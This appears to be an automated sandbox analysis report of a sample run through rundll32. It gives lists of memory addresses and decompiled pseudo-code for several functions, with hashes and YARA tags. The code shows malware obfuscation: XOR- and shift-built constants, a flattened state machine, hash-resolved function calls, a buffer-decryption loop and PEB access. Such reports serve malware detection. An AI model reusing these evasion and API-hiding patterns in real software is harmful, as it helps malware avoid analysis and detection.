0x100126da
0x100126dc
0x100126ed
0x100126f5
0x100126f7
0x10012708
0x10012710
0x10012712
0x10012727
0x1001272f
0x10012731
0x1001273e
0x1001273e
0x00000000
0x10012731
0x1001271b
0x10012721
0x00000000
0x00000000
0x10012723
0x10012723
0x00000000
0x10012723
0x10012700
0x10012706
0x00000000
0x00000000
0x00000000
0x10012706
0x100126e5
0x100126eb
0x00000000
0x00000000
0x00000000
0x100126eb
0x1001264b
0x1001264d
0x10012664
0x1001266c
0x1001266e
0x10012685
0x1001268d
0x1001268f
0x100126a6
0x100126ae
0x100126b0
0x100126bd
0x100126bd
0x00000000
0x100126b0
0x1001269c
0x100126a0
0x00000000
0x00000000
0x00000000
0x100126a0
0x1001267b
0x1001267f
0x00000000
0x00000000
0x00000000
0x1001267f
0x1001265a
0x1001265e
0x00000000
0x00000000
0x00000000
0x1001265e
0x100125bc
0x100125be
0x100125d5
0x100125dd
0x100125df
0x100125f6
0x100125fe
0x10012600
0x10012617
0x1001261f
0x10012621
0x1001262e
0x1001262e
0x00000000
0x10012621
0x1001260d
0x10012611
0x00000000
0x00000000
0x00000000
0x10012611
0x100125ec
0x100125f0
0x00000000
0x00000000
0x00000000
0x100125f0
0x100125cb
0x100125cf
0x00000000
0x00000000
0x00000000
0x100125cf
0x1001252c
0x1001252e
0x10012545
0x1001254d
0x1001254f
0x10012566
0x1001256e
0x10012570
0x10012587
0x1001258f
0x10012591
0x1001259e
0x1001259e
0x00000000
0x10012591
0x1001257d
0x10012581
0x00000000
0x00000000
0x00000000
0x10012581
0x1001255c
0x10012560
0x00000000
0x00000000
0x00000000
0x10012560
0x1001253b
0x1001253f
0x00000000
0x00000000
0x00000000
0x1001253f
0x1001249d
0x1001249f
0x100124b6
0x100124be
0x100124c0
0x100124d7
0x100124df
0x100124e1
0x100124f8
0x10012500
0x10012502
0x1001250f
0x1001250f
0x00000000
0x10012502
0x100124ee
0x100124f2
0x00000000
0x00000000
0x00000000
0x100124f2
0x100124cd
0x100124d1
0x00000000
0x00000000
0x00000000
0x100124d1
0x100124ac
0x100124b0
0x00000000
0x00000000
0x00000000
0x100124b0
0x1001240e
0x10012410
0x10012427
0x1001242f
0x10012431
0x10012448
0x10012450
0x10012452
0x10012469
0x10012471
0x10012473
0x10012480
0x10012480
0x00000000
0x10012473
0x1001245f
0x10012463
0x00000000
0x00000000
0x00000000
0x10012463
0x1001243e
0x10012442
0x00000000
0x00000000
0x00000000
0x10012442
0x1001241d
0x10012421
0x00000000
0x00000000
0x00000000
0x10012384
0x10012384
0x10012387
0x1001238b
0x1001238d
0x100123a0
0x100123a0
0x100123a4
0x100123a8
0x100123aa
0x100123bd
0x100123bd
0x100123c1
0x100123c5
0x100123c7
0x100123da
0x100123da
0x100123de
0x100123e2
0x100123e4
0x100123ea
0x100123ed
0x100123f1
0x100123f1
0x00000000
0x100123e4
0x100123cd
0x100123d0
0x100123d4
0x100123d8
0x00000000
0x00000000
0x00000000
0x100123d8
0x100123b0
0x100123b3
0x100123b7
0x100123bb
0x00000000
0x00000000
0x00000000
0x100123bb
0x10012393
0x10012396
0x1001239a
0x1001239e
0x00000000
0x00000000
0x00000000
0x1001239e
0x10012375
0x10012375
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 1c39788be6654e7f472a6d6b8ac8bcce38e696296feccd3c6038890bde7a81dd
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 4FC14EB3D0E9F30A8779C52D546422FEAA2AFC15C131BC3A09CE42F299D53ADDA495D0

Uniqueness

Uniqueness Score: -1.00%

Function 002A5060, Relevance: .2, Instructions: 171
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002A5060(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				void* _t159;
				signed int _t176;
				void* _t177;
				void* _t179;
				signed int _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				_push(_a24);
				_t177 = __edx;
				_push(_a20);
				_push(0xffffffff);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t159);
				_v12 = 0xcbc7;
				_t191 = _t190 + 0x20;
				_v12 = _v12 | 0x6207a749;
				_v12 = _v12 << 0xb;
				_t189 = 0;
				_v12 = _v12 >> 5;
				_t179 = 0x2a79b9cd;
				_v12 = _v12 ^ 0x01fbdccb;
				_v68 = 0x38d7;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00038494;
				_v56 = 0x468f;
				_v56 = _v56 + 0xffffeab5;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00005e29;
				_v52 = 0x7361;
				_v52 = _v52 + 0xffff3106;
				_v52 = _v52 + 0xeadf;
				_v52 = _v52 ^ 0x0000dffa;
				_v8 = 0x1f6;
				_v8 = _v8 | 0xbf4d4175;
				_v8 = _v8 + 0x5a52;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x005fdc16;
				_v48 = 0x477;
				_t187 = 0x31;
				_v48 = _v48 * 0x57;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x009f4c60;
				_v60 = 0x58a8;
				_v60 = _v60 * 0x13;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00006559;
				_v24 = 0xb7fe;
				_v24 = _v24 + 0xffff2507;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 | 0x139e816d;
				_v24 = _v24 ^ 0x139fe4a1;
				_v20 = 0xcfb1;
				_v20 = _v20 + 0xffff4f07;
				_v20 = _v20 + 0x9662;
				_v20 = _v20 | 0x79bb0dcf;
				_v20 = _v20 ^ 0x79bbc857;
				_v16 = 0x974b;
				_v16 = _v16 + 0xb9c6;
				_v16 = _v16 << 0xa;
				_v16 = _v16 | 0x4b0cac47;
				_v16 = _v16 ^ 0x4f4ce9da;
				_v44 = 0x2a52;
				_v44 = _v44 + 0x1edc;
				_v44 = _v44 / _t187;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0000753f;
				_v40 = 0xdfd8;
				_v40 = _v40 + 0xc03c;
				_v40 = _v40 ^ 0x6b56b66b;
				_v40 = _v40 ^ 0x7b75b46a;
				_v40 = _v40 ^ 0x1022d6d2;
				_v64 = 0xfa66;
				_v64 = _v64 + 0xb224;
				_v64 = _v64 + 0xffff4617;
				_v64 = _v64 ^ 0x0000d9f4;
				_v36 = 0xc2fb;
				_v36 = _v36 + 0xffff7083;
				_v36 = _v36 | 0x5eb877a2;
				_t188 = _v68;
				_v36 = _v36 * 0x5e;
				_v36 = _v36 ^ 0xc7bc5609;
				_v32 = 0x57cb;
				_v32 = _v32 * 0x79;
				_v32 = _v32 << 0xf;
				_v32 = _v32 + 0x88d4;
				_v32 = _v32 ^ 0xbf7a0527;
				_v28 = 0x84af;
				_v28 = _v28 + 0xd846;
				_v28 = _v28 | 0x44899c19;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x8913c1c6;
				while(_t179 != 0xa549ca5) {
					if(_t179 == 0x2795ab78) {
						_push(_t179);
						_push(_t179);
						_t189 = E002A9E2B(_t188 + _t188);
						_t191 = _t191 + 0xc;
						if(_t189 != 0) {
							_t179 = 0xa549ca5;
							continue;
						}
					} else {
						if(_t179 == 0x2a79b9cd) {
							_t179 = 0x337bab1b;
							continue;
						} else {
							if(_t179 != 0x337bab1b) {
								L11:
								if(_t179 != 0x10206f3e) {
									continue;
								}
							} else {
								_t176 = E00298CD6(_v12, _t177, _v68, 0, _a8, 0, _v56, _t179, _v52, _v8, 0xffffffff, _v48);
								_t188 = _t176;
								_t191 = _t191 + 0x28;
								if(_t176 != 0) {
									_t179 = 0x2795ab78;
									continue;
								}
							}
						}
					}
					return _t189;
				}
				E00298CD6(_v44, _t177, _v40, _t188, _a8, _t189, _v64, _t179, _v36, _v32, 0xffffffff, _v28);
				_t191 = _t191 + 0x28;
				_t179 = 0x10206f3e;
				goto L11;
			}

0x002a5069
0x002a506c
0x002a506e
0x002a5071
0x002a5073
0x002a5075
0x002a5078
0x002a507b
0x002a507c
0x002a507d
0x002a5082
0x002a5089
0x002a508c
0x002a5095
0x002a5099
0x002a509b
0x002a509f
0x002a50a4
0x002a50ab
0x002a50b2
0x002a50b6
0x002a50bd
0x002a50c4
0x002a50cb
0x002a50cf
0x002a50d6
0x002a50dd
0x002a50e4
0x002a50eb
0x002a50f2
0x002a50f9
0x002a5100
0x002a5107
0x002a510b
0x002a5112
0x002a511f
0x002a5120
0x002a5127
0x002a512a
0x002a5131
0x002a513c
0x002a513f
0x002a5143
0x002a514a
0x002a5151
0x002a5158
0x002a515c
0x002a5163
0x002a516a
0x002a5171
0x002a5178
0x002a517f
0x002a5186
0x002a518d
0x002a5194
0x002a519b
0x002a519f
0x002a51a6
0x002a51ad
0x002a51b4
0x002a51c0
0x002a51c3
0x002a51c7
0x002a51ce
0x002a51d5
0x002a51dc
0x002a51e3
0x002a51ea
0x002a51f1
0x002a51f8
0x002a51ff
0x002a5206
0x002a520d
0x002a5214
0x002a521b
0x002a5226
0x002a5229
0x002a522c
0x002a5233
0x002a523e
0x002a5241
0x002a5245
0x002a524c
0x002a5253
0x002a525a
0x002a5261
0x002a5268
0x002a526b
0x002a5272
0x002a5284
0x002a52e0
0x002a52e1
0x002a52eb
0x002a52ed
0x002a52f2
0x002a52f4
0x00000000
0x002a52f4
0x002a5286
0x002a528c
0x002a52cd
0x00000000
0x002a528e
0x002a5294
0x002a5327
0x002a532d
0x00000000
0x00000000
0x002a529a
0x002a52b8
0x002a52bd
0x002a52bf
0x002a52c4
0x002a52c6
0x00000000
0x002a52c6
0x002a52c4
0x002a5294
0x002a528c
0x002a533b
0x002a533b
0x002a531a
0x002a531f
0x002a5322
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e4e0df2904b610ad2025c9f89460ee27ef103b96a5f9defce0f231017b30dd
Instruction ID: bcfc84fb88141134c64a9539fd75106ff3a365c132542afde3c68c7099dfc97a
Opcode Fuzzy Hash: b6e4e0df2904b610ad2025c9f89460ee27ef103b96a5f9defce0f231017b30dd
Instruction Fuzzy Hash: BF812771C00219EBDF18CFE5D88A9EEBBB1FF44314F208119E521B62A0D7B94A55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002A3745, Relevance: .1, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E002A3745(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v116;
				void* _t83;
				void* _t91;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t100;
				signed int _t106;
				intOrPtr _t126;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t131;

				_t131 = __eflags;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t83);
				_v56 = 0x14fd44;
				_t126 = 0;
				_v52 = 0;
				_v32 = 0x73bb;
				_v32 = _v32 | 0x2e4357ca;
				_v32 = _v32 ^ 0x2e431d3d;
				_v28 = 0x8013;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00001744;
				_v24 = 0xdb9d;
				_t106 = 0x6e;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000ee762;
				_v20 = 0x82bf;
				_v20 = _v20 ^ 0x9c9d9e3a;
				_v20 = _v20 ^ 0x9c9d2bfa;
				_v40 = 0x21b3;
				_v40 = _v40 << 4;
				_v40 = _v40 ^ 0x000207cf;
				_v36 = 0x4e22;
				_v36 = _v36 * 0x32;
				_v36 = _v36 ^ 0x000f7b9f;
				_v16 = 0x77f8;
				_v16 = _v16 + 0xffff4140;
				_v16 = _v16 / _t106;
				_v16 = _v16 ^ 0x0253fa5e;
				_v12 = 0xd22;
				_v12 = _v12 + 0xf920;
				_v12 = _v12 + 0xffff02e6;
				_v12 = _v12 + 0x2a23;
				_v12 = _v12 ^ 0x000036e8;
				E002ACF95(_v32,  &_v116, _a12, _v28);
				_t91 = E00293545( &_v116, _v24, _t131, _v20,  &_v48);
				_t129 = _t127 + 0x24;
				while(_t91 != 0) {
					_t93 = E00293B97( &_v48, _v40, _v36, _v16,  &_v72, _v12);
					_t130 = _t129 + 0x10;
					__eflags = _t93;
					if(__eflags != 0) {
						_t96 = _v68 - 1;
						__eflags = _t96;
						if(_t96 == 0) {
							E0029D04B(_v72,  &_v64);
						} else {
							_t98 = _t96 - 1;
							__eflags = _t98;
							if(_t98 == 0) {
								E002A2A7D(_v72,  &_v64);
							} else {
								_t100 = _t98 - 1;
								__eflags = _t100;
								if(_t100 == 0) {
									E00296342(_v72,  &_v64);
								} else {
									__eflags = _t100 == 1;
									if(_t100 == 1) {
										E00291600(_v72,  &_v64);
									}
								}
							}
						}
						_t126 = _t126 + 1;
						__eflags = _t126;
					}
					_t91 = E00293545( &_v116, _v24, __eflags, _v20,  &_v48);
					_t129 = _t130 + 8;
				}
				return _t126;
			}

0x002a3745
0x002a374c
0x002a374f
0x002a3752
0x002a3755
0x002a3756
0x002a3757
0x002a375c
0x002a3763
0x002a3765
0x002a376b
0x002a3774
0x002a377b
0x002a3782
0x002a3789
0x002a378d
0x002a3794
0x002a37a1
0x002a37a2
0x002a37a5
0x002a37ac
0x002a37b3
0x002a37ba
0x002a37c1
0x002a37c8
0x002a37cc
0x002a37d3
0x002a37de
0x002a37e1
0x002a37e8
0x002a37ef
0x002a37fe
0x002a3801
0x002a3808
0x002a380f
0x002a3816
0x002a381d
0x002a3824
0x002a3834
0x002a3846
0x002a384b
0x002a38c6
0x002a3863
0x002a3868
0x002a386b
0x002a386d
0x002a3872
0x002a3872
0x002a3873
0x002a38ab
0x002a3875
0x002a3875
0x002a3875
0x002a3876
0x002a389e
0x002a3878
0x002a3878
0x002a3878
0x002a3879
0x002a3891
0x002a387b
0x002a387b
0x002a387c
0x002a3884
0x002a3884
0x002a387c
0x002a3879
0x002a3876
0x002a38b0
0x002a38b0
0x002a38b0
0x002a38be
0x002a38c3
0x002a38c3
0x002a38d0

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d1f340a2b1e18ff6a79e54d362e2e168347e1e3f82dc1d56a91e50757c29eb0
Instruction ID: 0545ba948b9606401a7c8bc5b51f5e7175838f8da2dabf447046614217d53778
Opcode Fuzzy Hash: 2d1f340a2b1e18ff6a79e54d362e2e168347e1e3f82dc1d56a91e50757c29eb0
Instruction Fuzzy Hash: F94102B1D1020EAFDF04DFA0C9858EEBBB5FF04304F208159E515B6260DBB95A29CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 002933F4, Relevance: .1, Instructions: 100
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002933F4(void* __ecx, void* __edx) {
				void* _t57;
				signed int _t63;
				unsigned int* _t77;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t87;
				unsigned int* _t92;
				signed int* _t93;
				signed int* _t94;
				signed int* _t95;
				unsigned int _t97;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t109;

				_t95 =  *(_t107 + 0x34);
				_push(_t95);
				_push( *(_t107 + 0x38));
				E0029E171(_t57);
				 *(_t107 + 0x38) =  *(_t107 + 0x38) & 0x00000000;
				_t93 =  &(_t95[1]);
				 *(_t107 + 0x3c) =  *(_t107 + 0x3c) & 0x00000000;
				 *((intOrPtr*)(_t107 + 0x30)) = 0x12bdd4;
				 *(_t107 + 0x34) = 0x35a9d5;
				 *(_t107 + 0x24) = 0x66dc;
				 *(_t107 + 0x24) =  *(_t107 + 0x24) ^ 0x03226dab;
				 *(_t107 + 0x24) =  *(_t107 + 0x24) ^ 0x03225720;
				 *(_t107 + 0x20) = 0xab63;
				_t80 = 0x3d;
				 *(_t107 + 0x20) =  *(_t107 + 0x20) * 6;
				 *(_t107 + 0x20) =  *(_t107 + 0x20) ^ 0x00047efb;
				 *(_t107 + 0x48) = 0x3efd;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) ^ 0xd26af66b;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) / _t80;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) >> 9;
				 *(_t107 + 0x48) =  *(_t107 + 0x48) ^ 0x0001dfcd;
				 *(_t107 + 0x1c) = 0x340b;
				 *(_t107 + 0x1c) =  *(_t107 + 0x1c) | 0x18f7a97e;
				 *(_t107 + 0x1c) =  *(_t107 + 0x1c) ^ 0x18f7d39f;
				_t81 =  *_t95;
				_t94 =  &(_t93[1]);
				_t63 =  *_t93 ^ _t81;
				 *(_t107 + 0x28) = _t81;
				 *(_t107 + 0x2c) = _t63;
				_t40 = _t63 + 1; // 0xd26af66c
				_t97 =  !=  ? (_t40 & 0xfffffffc) + 4 : _t40;
				_t77 = E002A9E2B(_t97);
				_t109 = _t107 + 0x14;
				 *(_t109 + 0x38) = _t77;
				if(_t77 != 0) {
					_t105 = 0;
					_t92 = _t77;
					_t103 =  >  ? 0 :  &(_t94[_t97 >> 2]) - _t94 + 3 >> 2;
					if(_t103 != 0) {
						_t78 =  *(_t109 + 0x1c);
						do {
							_t85 =  *_t94;
							_t94 =  &(_t94[1]);
							_t86 = _t85 ^ _t78;
							 *_t92 = _t86;
							_t92 =  &(_t92[1]);
							_t87 = _t86 >> 0x10;
							 *((char*)(_t92 - 3)) = _t86 >> 8;
							 *(_t92 - 2) = _t87;
							_t105 = _t105 + 1;
							 *((char*)(_t92 - 1)) = _t87 >> 8;
						} while (_t105 < _t103);
						_t77 =  *(_t109 + 0x3c);
					}
					 *((char*)(_t77 +  *((intOrPtr*)(_t109 + 0x20)))) = 0;
				}
				return _t77;
			}

0x002933f9
0x002933fe
0x002933ff
0x00293405
0x0029340a
0x0029340f
0x00293412
0x00293419
0x00293421
0x00293429
0x00293431
0x00293439
0x00293441
0x00293450
0x00293451
0x00293455
0x0029345d
0x00293465
0x00293473
0x00293477
0x0029347c
0x00293484
0x0029348c
0x00293494
0x0029349c
0x002934a0
0x002934a3
0x002934a5
0x002934a9
0x002934ad
0x002934bd
0x002934d9
0x002934db
0x002934de
0x002934e4
0x002934ec
0x002934ee
0x002934ff
0x00293504
0x00293506
0x0029350a
0x0029350a
0x0029350c
0x0029350f
0x00293511
0x00293518
0x0029351b
0x0029351e
0x00293521
0x00293527
0x00293528
0x0029352b
0x0029352f
0x0029352f
0x00293538
0x00293538
0x00293544

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131a1208fe89b1cd37f64d440b1b3dae41238e441c7f73f987f6ac53da5d77d0
Instruction ID: b9f8ced8286dd07cf9a91721b03ecf4f9824a406dae7552551d2d3d8efe22c68
Opcode Fuzzy Hash: 131a1208fe89b1cd37f64d440b1b3dae41238e441c7f73f987f6ac53da5d77d0
Instruction Fuzzy Hash: F3418B72A183419FC718CF29C88550BFBE0EF89308F454A2DF98A97250C775DA59CB96

Uniqueness

Uniqueness Score: -1.00%

Function 002A1C79, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E002A1C79(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t55;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				void* _t83;

				_t83 = __ecx;
				E0029E171(_t55);
				_v32 = 0x744982;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0xbe50;
				_t71 = 0x11;
				_v8 = _v8 / _t71;
				_t72 = 0x14;
				_v8 = _v8 * 0x78;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x00000787;
				_v20 = 0xcaac;
				_t73 = 0x67;
				_v20 = _v20 / _t72;
				_v20 = _v20 ^ 0x000028f7;
				_v12 = 0x7358;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 / _t73;
				_t41 = _t73 + 0x2d; // 0x94
				_v12 = _v12 ^ 0x00005d5e;
				_v16 = 0x963;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00003208;
				_t68 = E0029606F(_t41, 0xbee648b, _t73, _t73, 0x330c21b7);
				return  *_t68(_t83, _a16, 0x60, _a24, 0, 0, __ecx, __edx, _a4, _a8, _a12, _a16, _a20, _a24, 0, 0x60, 0);
			}

0x002a1c83
0x002a1c9d
0x002a1ca2
0x002a1cab
0x002a1cae
0x002a1cb1
0x002a1cbd
0x002a1cc2
0x002a1ccb
0x002a1cce
0x002a1cd1
0x002a1cd5
0x002a1cdc
0x002a1ce8
0x002a1ce9
0x002a1cee
0x002a1cf8
0x002a1cff
0x002a1d0d
0x002a1d10
0x002a1d13
0x002a1d1a
0x002a1d21
0x002a1d25
0x002a1d3f
0x002a1d59

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd094e51bd3523a174c7474f50d79bafc8b9e248ad6523f0169531f8c17e7f
Instruction ID: 60010f330cdbd45952493e87db9a908bc78f4d5e15d6781a7b1ae5904002a3d1
Opcode Fuzzy Hash: 05dd094e51bd3523a174c7474f50d79bafc8b9e248ad6523f0169531f8c17e7f
Instruction Fuzzy Hash: CC210776A00208EBEF04DF95C84A9DEBBB6EB84704F10808AE914A6250D7B55A21DF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A8313, Relevance: .1, Instructions: 57
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002A8313() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t76;

				_v32 = _v32 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v40 = 0x49a553;
				_v20 = 0x722a;
				_v20 = _v20 << 3;
				_t76 = 0x41;
				_v20 = _v20 * 0x33;
				_v20 = _v20 ^ 0x00b5fae5;
				_v8 = 0xd86c;
				_v8 = _v8 + 0xffffb7a4;
				_v8 = _v8 >> 1;
				_v8 = _v8 + 0x2819;
				_v8 = _v8 ^ 0x00002d1a;
				_v16 = 0xf4c3;
				_v16 = _v16 ^ 0x451e33d0;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 * 0x30;
				_v16 = _v16 ^ 0x0067b55b;
				_v28 = 0x558;
				_v28 = _v28 / _t76;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x00152446;
				_v12 = 0xb049;
				_v12 = _v12 | 0x23203aa3;
				_v12 = _v12 * 0x5f;
				_v12 = _v12 ^ 0xda555cae;
				_v12 = _v12 ^ 0xd37015a4;
				_v24 = 0x436a;
				_v24 = _v24 + 0xf179;
				_v24 = _v24 | 0x8b53c7cf;
				_v24 = _v24 ^ 0x8b539345;
				E00293A1B(_v16, _v28, _v12, E002A746E(_t76), _v24,  &_v32);
				return _v32;
			}

0x002a8319
0x002a831f
0x002a8323
0x002a832a
0x002a8331
0x002a833b
0x002a833c
0x002a833f
0x002a8346
0x002a834d
0x002a8354
0x002a8357
0x002a835e
0x002a8365
0x002a836c
0x002a8373
0x002a837b
0x002a837e
0x002a8385
0x002a8391
0x002a8394
0x002a8398
0x002a839f
0x002a83a6
0x002a83b1
0x002a83b4
0x002a83bb
0x002a83c2
0x002a83c9
0x002a83d0
0x002a83d7
0x002a83fa
0x002a8408

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f549f491e99f7eabe698410758ac47cc5c37a86684057171c8297d9b4b9aff
Instruction ID: 97464fd90d45d732d237bfba9313600f793a2d3ccc746e2d4d5ff8b7dcbf4823
Opcode Fuzzy Hash: c3f549f491e99f7eabe698410758ac47cc5c37a86684057171c8297d9b4b9aff
Instruction Fuzzy Hash: 4331B171C0120AEBDF48CFA4CA8A5AEFBB1FF04304F608199D525B6290D7B85B59CF84

Uniqueness

Uniqueness Score: -1.00%

Function 002A76B2, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002A76B2() {

				return  *[fs:0x30];
			}

0x002a76b8

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10005B96, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10005B96(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E10007B2B(E100155AB, __ebx, __edi, __esi);
				E10006121(_t44 - 0x14, 0);
				_t43 =  *0x1001c494; // 0x782b50
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c5ac));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E10005797(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E10006AB2(_t44 - 0x20, "bad cast");
							E10006B9C(_t44 - 0x20, 0x10019754);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x1001c494 =  *((intOrPtr*)(_t44 - 0x10));
						E10004908( *((intOrPtr*)(_t44 - 0x10)));
						E100062C2(_t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E10006149(_t44 - 0x14);
				return E10007BCA(_t41);
			}

0x10005b96
0x10005b9d
0x10005ba7
